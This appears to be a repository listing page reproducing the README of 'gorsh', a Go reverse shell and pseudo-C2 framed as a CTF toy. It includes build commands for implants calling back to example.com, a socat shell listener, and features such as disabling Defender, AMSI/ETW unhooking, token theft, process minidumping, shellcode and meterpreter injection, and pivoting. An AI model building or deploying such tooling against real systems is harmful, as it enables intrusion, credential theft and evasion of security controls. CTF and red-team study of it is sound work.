audibleblink
gorsh
Shell

A toy CTF Golang Reverse Shell w/ a Tmux-driven psuedo-C2 Interface

Last updated Dec 9, 2025
87
Stars
21
Forks
1
Issues
0
Stars/day
Attention Score
13
Language breakdown
Shell 91.0%
Go 8.1%
Makefile 0.6%
C 0.2%
Files click to expand
README

gorsh

A toy CTF Golang Reverse Shell w/ a Tmux-driven psuedo-C2 Interface

forthebadge forthebadge forthebadge forthebadge

asciicast

Usage

Generate agents with:

# For the make targets, you only need theLHOSTandLPORTenvironment variables.
$ make {windows,macos,linux} LHOST=example.com LPORT=443

Generate the server with:

# For the make targets, you only need theLHOSTandLPORTenvironment variables.
$ make server LPORT=443

Gen everything with make all LHOST=example.com LPORT=443

Catching the shell

make listen LPORT=443

Tmux is powerful terminal multiplexer with robust session/windows/pane management. It works better at managing multiple reverse shells than most shell managers I've seen. The server binary creates a tmux session per host and a window per each reverse shell binary invocation. If you run the spawn command on a shell, a new window will open in the host's session, creating a "tab".

To catch a shell without gorsh-server and/or tmux, use:

socat -d -d OPENSSL-LISTEN:443,reuseaddr,cert=certs/server.pem,verify=0,fork READLINE

Features

  • Network scanner
  • Ligolo-ng tunnels for socks-less pivoting
  • Tab completion (dependent on exec method)
  • Duplicate your shells with 'spawn'

Windows

  • Disable Defender (or any process) by demoting process tokens to untrusted.
  • Execute Assembly - assemblies are gzipped & embedded. No hosting necessary
  • Unhook modules (w/ builtins for AMSI and ETW)
  • steal_token / revtoself
  • getsystem - if admin
  • minidump any process (uses comsvcs.dll)
  • shellcode injection
  • can fetch and inject meterpreter tcp and http stages
- or any other shellcode that follows the metasploit staging protocol - first 4 bytes indicating the size of the following payload - [size][payload]

Not Windows

  • setuid, useful for UID spoofing to bypass NFS "ACLs"
  • Enumeration scripts
- linpeas - linenum

Execute Assembly

Assemblies are gzipped and embedded within the implant. Since this is a CTF shell, I'm optimizing for ease of use and not tradecraft.

  • make list-assemblies will show available assemblies from Flangvik's SharpCollection project.
  • make choose-assemblies will bring up fzf, where you can filter and choose
what assemblies you want embedded. They will be embedded at the next build time.
  • to embed any other assemblies not in SharpCollection. gzip it and copy it to ./pkg/execute_assembly/embed/

Ligolo-NG Tunnels

Agents have the ligolo client embedded. Run make start-ligolo to prepare interfaces and run ligolo-ng. From an agent, run pivot and a callback should land within the ligolo interface. Select the callback in ligolo and start routing. On your box, create a route to the remote network through the tun interface and all traffic to that destination will now egress through ligolo.

ip route add 172.16.43.0/24 dev ligolo</code></pre>

File upload/download

Since this is a reverse shell, only sharing its stdin/out/err through a network socket, traditional methods of uploading and downloading file aren't available. There's a docker smb server to bridge that gap. Configure the directories to be shared in the Makefile, then run make start-smb. If you wish to see logs so you can monitor callbacks, use make smblogs. Windows implants understand UNC paths, so something like cp //myip/tools/mimikatz.exe .` is possible.

🔗 More in this category

© 2026 GitRepoTrend · audibleblink/gorsh · Updated daily from GitHub